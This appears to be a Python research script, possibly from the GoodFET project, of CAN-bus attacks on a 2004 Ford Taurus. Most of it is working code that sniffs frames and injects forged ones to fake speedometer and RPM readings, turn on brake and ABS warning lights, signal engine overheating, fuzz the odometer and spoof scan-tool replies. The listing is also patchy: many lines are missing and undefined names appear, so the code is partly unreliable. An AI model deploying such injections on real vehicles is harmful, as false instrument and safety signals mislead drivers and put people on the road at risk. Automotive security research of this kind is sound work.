4 import csv, time, argparse;
8 from random import randrange
9 from GoodFETMCPCAN import GoodFETMCPCAN;
10 from experiments import experiments
11 from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication
12 from intelhex import IntelHex;
17 class FordExperiments(experiments):
19 This class is a subclass of experiments and is a car specific module for
20 demonstrating and testing hacks.
def __init__(self, dataLocation="../../contrib/ThayerData/"):
    """
    Initialize the experiment object through GoodFETMCPCANCommunication.

    @param dataLocation: path handed unchanged to
                         GoodFETMCPCANCommunication.__init__; defaults to
                         "../../contrib/ThayerData/"
    """
    # The base initializer is invoked explicitly by class name; the
    # cooperative super() form was left disabled by the original author.
    GoodFETMCPCANCommunication.__init__(self, dataLocation)
27 def mimic1056(self,packetData,runTime):
30 self.spitSetup(self.freq)
31 #FIGURE out how to clear buffers
32 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
33 packet1 = self.client.rxpacket();
35 packetParsed = self.client.packet2parsed(packet1);
36 #keep sniffing till we read a packet
37 while( packet1 == None or packetParsed.get('sID') != 1056 ):
38 packet1 = self.client.rxpacket()
40 packetParsed = self.client.packet2parsed(packet1)
41 recieveTime = time.time()
42 packetParsed = self.client.packet2parsed(packet1)
43 if( packetParsed['sID'] != 1056):
44 print "Sniffed wrong packet"
46 countInitial = ord(packetParsed['db3']) #initial count value
48 #set data packet to match what was sniffed or at least what was input
51 if(packetData.get(idx) == None):
52 packet.append(ord(packetParsed.get(idx)))
54 packet.append(packetData.get(idx))
56 #### split SID into different regs
57 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
58 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
59 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
60 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
62 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
64 self.client.txpacket(packet);
66 while( (time.time()-recieveTime) < runTime):
67 #care about db3 or packet[8] that we want to count at the rate that it is
68 dT = time.time()-tpast
70 db3 = (countInitial + math.floor((time.time()-recieveTime)/0.2))%255
72 self.client.txpacket(packet)
76 self.client.MCPrts(TXB0=True)
77 tpast = time.time() #update our transmit time on the one before
81 def cycledb1_1056(self,runTime):
85 #FIGURE out how to clear buffers
86 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
87 packet1 = self.client.rxpacket();
89 packetParsed = self.client.packet2parsed(packet1);
90 #keep sniffing till we read a packet
91 while( packet1 == None or packetParsed.get('sID') != 1056 ):
93 packet1 = self.client.rxpacket()
95 packetParsed = self.client.packet2parsed(packet1)
96 recieveTime = time.time()
97 packetParsed = self.client.packet2parsed(packet1)
98 if( packetParsed['sID'] != 1056):
99 print "Sniffed wrong packet"
102 #set data packet to match what was sniffed or at least what was input
105 packet.append(ord(packetParsed.get(idx)))
107 packet[1] = packetValue;
110 #### split SID into different regs
111 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
112 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
113 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
114 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
115 # lower nibble is DLC
116 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
118 self.client.txpacket(packet);
120 while( (time.time()-recieveTime) < runTime):
121 #care about db3 or packet[8] that we want to count at the rate that it is
122 dT = time.time()-tpast
125 #temp = ((packetValue+1))%2
127 # pV = packetValue%255
133 self.client.txpacket(packet)
135 tpast = time.time() #update our transmit time on the one before
138 def getBackground(self,sId):
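140 This method gets the background packet for the given id. This
141 is a simple "background" retriever in that it returns a packet
142 with the given id that was sniffed off the bus. The wait for a matching id is limited to 20 seconds, but that limit is not applied while rxpacket() returns None.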
144 packet1 = self.client.rxpacket();
146 packetParsed = self.client.packet2parsed(packet1);
147 #keep sniffing till we read a packet
148 startTime = time.time()
149 while( packet1 == None or packetParsed.get('sID') != sId and (time.time() - startTime) < 20):
150 packet1 = self.client.rxpacket()
152 packetParsed = self.client.packet2parsed(packet1)
154 #recieveTime = time.time()
157 def cycle4packets1279(self):
158 self.client.serInit()
161 self.addFilter([1279, 1279, 1279, 1279, 1279, 1279], verbose = False)
162 packetParsed = self.getBackground(1279)
164 if (packetParsed[db0] == 16):
165 # if it's the first of the four packets, replace the value in db7 with 83
166 packetParsed[db7] = 83
167 # transmit new packet
168 self.client.txpacket(packetParsed)
170 # otherwise, leave it alone
171 # transmit same packet we read in
172 self.client.txpacket(packetParsed)
173 # print the packet we are transmitting
176 def oscillateMPH(self,runTime):
177 self.client.serInit()
179 #FIGURE out how to clear buffers
180 self.addFilter([513, 513, 513, 513,513, 513], verbose=False)
181 packetParsed = self.getBackground(513)
183 #set data packet to match what was sniffed or at least what was input
186 packet.append(packetParsed.get(idx))
188 packet[1] = packetValue;
191 #### split SID into different regs
192 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
193 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
194 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
195 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
196 # lower nibble is DLC
197 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
199 self.client.txpacket(packet);
200 startTime = tT.time()
201 while( (tT.time()-startTime) < runTime):
202 dt = tT.time()-startTime
203 inputValue = ((2.0*math.pi)/20.0)*dt
204 value = 35*math.sin(inputValue)+70
210 #packet[9] = int(value)
211 packet[5] = int(value)
213 self.client.txpacket(packet)
215 def oscillateTemperature(self,runTime):
221 self.client.serInit()
223 #FIGURE out how to clear buffers
224 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
225 packetParsed = self.getBackground(1056)
227 #set data packet to match what was sniffed or at least what was input
230 packet.append(packetParsed.get(idx))
232 packet[1] = packetValue;
235 #### split SID into different regs
236 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
237 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
238 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
239 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
240 # lower nibble is DLC
241 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
243 self.client.txpacket(packet);
244 startTime = tT.time()
245 while( (tT.time()-startTime) < runTime):
246 dt = tT.time()-startTime
247 inputValue = ((2.0*math.pi)/20.0)*dt
248 value = 30*math.sin(inputValue)+130
250 #packet[5] = int(value)
257 self.client.txpacket(packet)
259 #tpast = time.time() #update our transmit time on the one before
264 #reset everything on the chip
265 self.client.serInit()
267 duration = 20; #seconds
270 listenPacket = [2, 9, 6, 153, 153, 153, 153, 153]
272 #actual response by the car
273 #r1 = [34, 88, 0, 0, 0, 0, 0, 0]
274 #r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
275 #r3 = [16, 19, 73, 4, 1, 70, 65, 66]
277 r1 = [34, 88, 0, 0, 0, 0, 0, 0]
278 r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
279 r3 = [16, 19, 73, 160, 159, 70, 65, 66]
282 SIDlow = (responseID & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
283 SIDhigh = (responseID >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
284 packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
285 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
286 # lower nibble is DLC
287 r1[0],r1[1],r1[2],r1[3],r1[4],r1[5],r1[6],r1[7]]
288 packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
289 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
290 # lower nibble is DLC
291 r2[0],r2[1],r2[2],r2[3],r2[4],r2[5],r2[6],r2[7]]
292 packet3 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
293 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
294 # lower nibble is DLC
295 r3[0],r3[1],r3[2],r3[3],r3[4],r3[5],r3[6],r3[7]]
297 self.multiPacketSpit(packet0 = r1, packet1 = r2, packet2 = r3, packet0rts = True, packet1rts = True, packet2rts = True)
299 #filter for the correct packet
300 self.filterForPacket(listenID, listenPacket[0],listenPacket[1], verbose = True)
301 self.client.rxpacket()
302 self.client.rxpacket() # flush buffers if there is anything
303 startTime = tT.time()
304 while( (tT.time() -startTime) < duration):
305 packet = self.client.rxpacket()
307 sid = ord(packet[0])<<3 | ord(packet[1])>>5
308 if( sid == listenID):
309 byte3 = ord(packet[6])
310 if( byte3 == listenPacket[3]):
311 print "SendingPackets!"
313 self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True)
315 def setScanToolTemp(self,temp):
316 self.client.serInit()
319 self.addFilter([2024, 2024, 2024])
320 self.client.rxpacket()
321 self.client.rxpacket()
322 self.client.rxpacket()
323 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
324 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
326 startTime = time.time()
327 #while((time.time() - startTime) < 10):
331 # catch a packet and check its db4 value
332 while (packet == None):
333 packet=self.client.rxpacket();
336 newTemp = math.ceil(level/1.8 + 22)
337 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
340 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
341 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
342 # lower nibble is DLC
343 ord(packet[5]),ord(packet[6]),ord(packet[7]),newTemp,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
345 # load new packet into TXB0 and check time
346 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
347 starttime = time.time()
349 # spit new value for 10 seconds
350 while (time.time()-starttime < 10):
351 self.multiPacketSpit(packet0rts=True)
353 def overHeatEngine(self):
354 self.client.serInit()
357 self.addFilter([1056, 1056, 1056])
358 packet = self.getBackground(1056)
359 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
360 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
362 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
363 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
364 # lower nibble is DLC
365 0xfa,packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
366 startTime = time.time()
367 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
368 while( time.time()- startTime < 10):
369 self.multiPacketSpit(packet0rts=True)
371 def runOdometer(self):
372 self.client.serInit()
375 self.addFilter([1056, 1056, 1056])
376 packet = self.getBackground(1056)
377 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
378 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
379 odomFuzz = random.randint(0,255)
381 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
382 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
383 # lower nibble is DLC
384 packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
386 startTime = time.time()
387 packet[6] = odomFuzz;
388 while( time.time()- startTime < 10):
389 odomFuzz = random.randint(0,255)
390 newPacket[6] = odomFuzz
391 self.client.txpacket(newPacket)
393 def setDashboardTemp(self, temp):
394 self.client.serInit()
397 self.addFilter([1056, 1056, 1056])
398 self.client.rxpacket()
399 self.client.rxpacket()
400 self.client.rxpacket()
401 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
402 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
404 startTime = time.time()
405 #while((time.time() - startTime) < 10):
409 # catch a packet and check its db4 value
410 while (packet == None):
411 packet=self.client.rxpacket();
414 newTemp = math.ceil(level/1.8 + 22)
415 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
418 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
419 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
420 # lower nibble is DLC
421 newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
423 # load new packet into TXB0 and check time
424 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
425 starttime = time.time()
427 # spit new value for 10 seconds
428 while (time.time()-starttime < 10):
429 self.multiPacketSpit(packet0rts=True)
432 def warningLightsOn(self,checkEngine, checkTransmission, transmissionOverheated, engineLight, battery, fuelCap, checkBreakSystem,ABSLight):
433 self.addFilter([1056, 1056, 530, 530, 1056])
434 if( checkBreakSystem == 1 or ABSLight == 1):
435 SIDlow = (530 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
436 SIDhigh = (530 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
437 packet = self.getBackground(530)
438 packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
439 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
440 # lower nibble is DLC
441 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
442 if( checkBreakSystem == 1 and ABSLight == 1):
444 elif( checkBreakSystem == 0 and ABSLight == 1):
446 elif(checkBreakSystem==1 and ABSLight == 0):
453 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
454 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
455 packet = self.getBackground(1056)
456 packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
457 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
458 # lower nibble is DLC
459 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
460 if( checkEngine == 1):
463 if( checkTransmission == 1):
466 if( transmissionOverheated == 1):
469 if( engineLight == 1):
478 # load new packet into TXB0 and check time
479 self.multiPacketSpit(packet0=packet1,packet1=packet2, packet0rts=True,packet1rts=packet2rts )
480 starttime = time.time()
482 # spit new value for 10 seconds
483 while ((time.time()-starttime) < 10):
484 self.multiPacketSpit(packet0rts=True,packet1rts = packet2rts)
486 def fakeScanToolFuelLevel(self,level):
487 self.client.serInit()
490 self.addFilter([2024, 2024, 2024])
491 self.client.rxpacket()
492 self.client.rxpacket()
493 self.client.rxpacket()
494 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
495 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
497 startTime = time.time()
498 #while((time.time() - startTime) < 10):
502 # catch a packet and check its db4 value
503 while (packet == None):
504 packet=self.client.rxpacket();
506 level = int(level/.4)
507 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
510 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
511 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
512 # lower nibble is DLC
513 3,65,47,level,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
515 # load new packet into TXB0 and check time
516 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
517 starttime = time.time()
519 # spit new value for 10 seconds
520 while (time.time()-starttime < 10):
521 self.multiPacketSpit(packet0rts=True)
523 def fakeOutsideTemp(self,level):
524 self.client.serInit()
527 self.addFilter([2024, 2024, 2024,2024,2024,2024])
528 self.client.rxpacket()
529 self.client.rxpacket()
530 self.client.rxpacket()
531 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
532 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
534 startTime = time.time()
535 #while((time.time() - startTime) < 10):
539 # catch a packet and check its db4 value
540 while (packet == None):
541 packet=self.client.rxpacket();
543 newTemp = int(math.ceil(level/1.8 + 22))
544 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
547 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
548 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
549 # lower nibble is DLC
550 03,65,70,newTemp,0,0,0,0]
552 # load new packet into TXB0 and check time
553 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
554 starttime = time.time()
556 # spit new value for 10 seconds
557 while (time.time()-starttime < 10):
558 self.multiPacketSpit(packet0rts=True)
561 def fakeAbsTps(self,level):
562 self.client.serInit()
565 self.addFilter([2024, 2024, 2024])
566 self.client.rxpacket()
567 self.client.rxpacket()
568 self.client.rxpacket()
569 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
570 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
572 startTime = time.time()
573 #while((time.time() - startTime) < 10):
577 # catch a packet and check its db4 value
578 while (packet == None):
579 packet=self.client.rxpacket();
581 abstps = int(math.ceil(level/.39))
585 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
586 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
587 # lower nibble is DLC
588 ord(packet[5]),ord(packet[6]),ord(packet[7]),abstps,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
590 # load new packet into TXB0 and check time
591 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
592 starttime = time.time()
594 # spit new value for 10 seconds
595 while (time.time()-starttime < 10):
596 self.multiPacketSpit(packet0rts=True)
def mphToByteValue(self, mph):
    """
    Convert a speed in miles per hour to the raw byte-scale value.

    This is the inverse of the linear mapping mph = 1.617*value - 63.5
    that the rest of the class uses. The result is neither rounded nor
    clamped to a byte range here; callers truncate it with int().

    @param mph: speed in miles per hour
    @return: (mph + 63.5) / 1.617
    """
    shifted = mph + 63.5
    return shifted / 1.617
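def ByteValuToMph(self, value):
    """
    Convert a raw byte-scale value to miles per hour.

    @param value: numeric byte value (apply ord() first if it comes from a
                  raw packet character)
    @return: 1.617*value - 63.5
    """
    # The previous body ignored `value` and indexed a name `packet` that is
    # not defined in this method, so every call raised NameError.
    return 1.617 * value - 63.5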
606 def setMPH(self, mph):
607 self.client.serInit()
610 self.addFilter([513, 513, 513])
611 self.client.rxpacket()
612 self.client.rxpacket()
613 self.client.rxpacket()
614 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
615 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
617 startTime = time.time()
618 #while((time.time() - startTime) < 10):
622 # catch a packet and check its db4 value
623 while (packet == None):
624 packet=self.client.rxpacket();
626 #print self.client.packet2str(packet)
628 #print "DB4 = %02d " %ord(packet[9])
630 #print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
632 # calculate our new mph and db4 value
634 newSpeed = self.mphToByteValue(mph)
635 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
638 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
639 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
640 # lower nibble is DLC
641 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
643 # load new packet into TXB0 and check time
644 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
645 starttime = time.time()
647 # spit new value for 10 seconds
648 while (time.time()-starttime < 10):
649 self.multiPacketSpit(packet0rts=True)
652 def speedometerHack(self, inputs):
654 self.client.serInit()
657 self.addFilter([513, 513, 513])
659 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
660 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
666 # catch a packet and check its db4 value
667 while (packet == None):
668 packet=self.client.rxpacket();
670 print self.client.packet2str(packet)
672 print "DB4 = %02d " %ord(packet[9])
673 mph = 1.617*ord(packet[9]) - 63.5
674 print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
676 # calculate our new mph and db4 value
677 mph = mph + inputs[0];
678 newSpeed = ( mph + 63.5 ) / 1.617
679 print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
682 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
683 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
684 # lower nibble is DLC
685 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
687 # load new packet into TXB0 and check time
688 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
689 starttime = time.time()
691 # spit new value for 1 second
692 while (time.time()-starttime < 1):
693 self.multiPacketSpit(packet0rts=True)
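def rpmToByteValue(self, rpm):
    """
    Convert an engine speed in RPM to the raw byte-scale value.

    Inverse of the linear mapping rpm = 64.5*value - 61.88. The result is
    neither rounded nor clamped to a byte range here.

    @param rpm: engine speed in revolutions per minute
    @return: (rpm + 61.88) / 64.5
    """
    value = (rpm + 61.88) / 64.5
    # No return follows the assignment in this listing, which would hand
    # None to setRPM's int() call; return the computed value explicitly.
    return value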
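def ValueTorpm(self, value):
    """
    Convert a raw byte-scale value to an engine speed in RPM.

    @param value: numeric byte value (apply ord() first if it comes from a
                  raw packet character)
    @return: 64.5*value - 61.88
    """
    rpm = 64.5 * value - 61.88
    # No return follows the assignment in this listing, so the result was
    # discarded; return it so the conversion is usable.
    return rpm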
703 def setRPM(self, rpm):
704 self.client.serInit()
707 self.addFilter([513, 513, 513,513])
709 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
710 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
713 self.client.rxpacket()
714 self.client.rxpacket()
715 self.client.rxpacket()
717 startTime = tT.time()
718 while((tT.time() - startTime )< 10):
722 # catch a packet and check its db4 value
723 while (packet == None):
724 packet=self.client.rxpacket();
726 #print self.client.packet2str(packet)
728 #print "DB4 = %02d " %ord(packet[5])
730 #print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
732 newRPM = self.rpmToByteValue(rpm)
733 #print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
736 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
737 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
738 # lower nibble is DLC
739 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
741 # load new packet into TXB0 and check time
742 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
743 starttime = time.time()
745 # spit new value for 1 second
746 while (time.time()-starttime < 1):
747 self.multiPacketSpit(packet0rts=True)
749 def rpmHack(self, inputs):
751 This method will increase the rpm by the given rpm amount.
754 @param inputs: Single element of a list that corresponds to the amount the user
758 self.client.serInit()
761 self.addFilter([513, 513, 513])
763 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
764 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
765 startTime = tT.time()
766 while((tT.time() - startTime )< 10):
770 # catch a packet and check its db4 value
771 while (packet == None):
772 packet=self.client.rxpacket();
774 print self.client.packet2str(packet)
776 print "DB4 = %02d " %ord(packet[5])
777 rpm = 64.5*ord(packet[5]) - 61.88
778 print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
780 # calculate our new rpm and db0 value
781 rpm = rpm + inputs[0];
782 newRPM = ( rpm + 61.88 ) / 64.5
784 print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
787 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
788 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
789 # lower nibble is DLC
790 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
792 # load new packet into TXB0 and check time
793 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
794 starttime = time.time()
796 # spit new value for 1 second
797 while (time.time()-starttime < 1):
798 self.multiPacketSpit(packet0rts=True)
803 if __name__ == "__main__":
805 parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description='''\
807 Run Hacks on a Ford taurus 2004:
813 parser.add_argument('verb', choices=['speedometerHack', 'rpmHack']);
814 parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None);
817 args = parser.parse_args();
818 inputs = args.variable
819 fe = FordExperiments("../../contrib/ThayerData/");
821 if( args.verb == 'speedometerHack'):
822 fe.speedometerHack(inputs=inputs)
823 if( args.verb == 'rpmHack'):
824 fe.rpmHack(inputs=inputs)
825 elif( args.verb == 'fakeVIN'):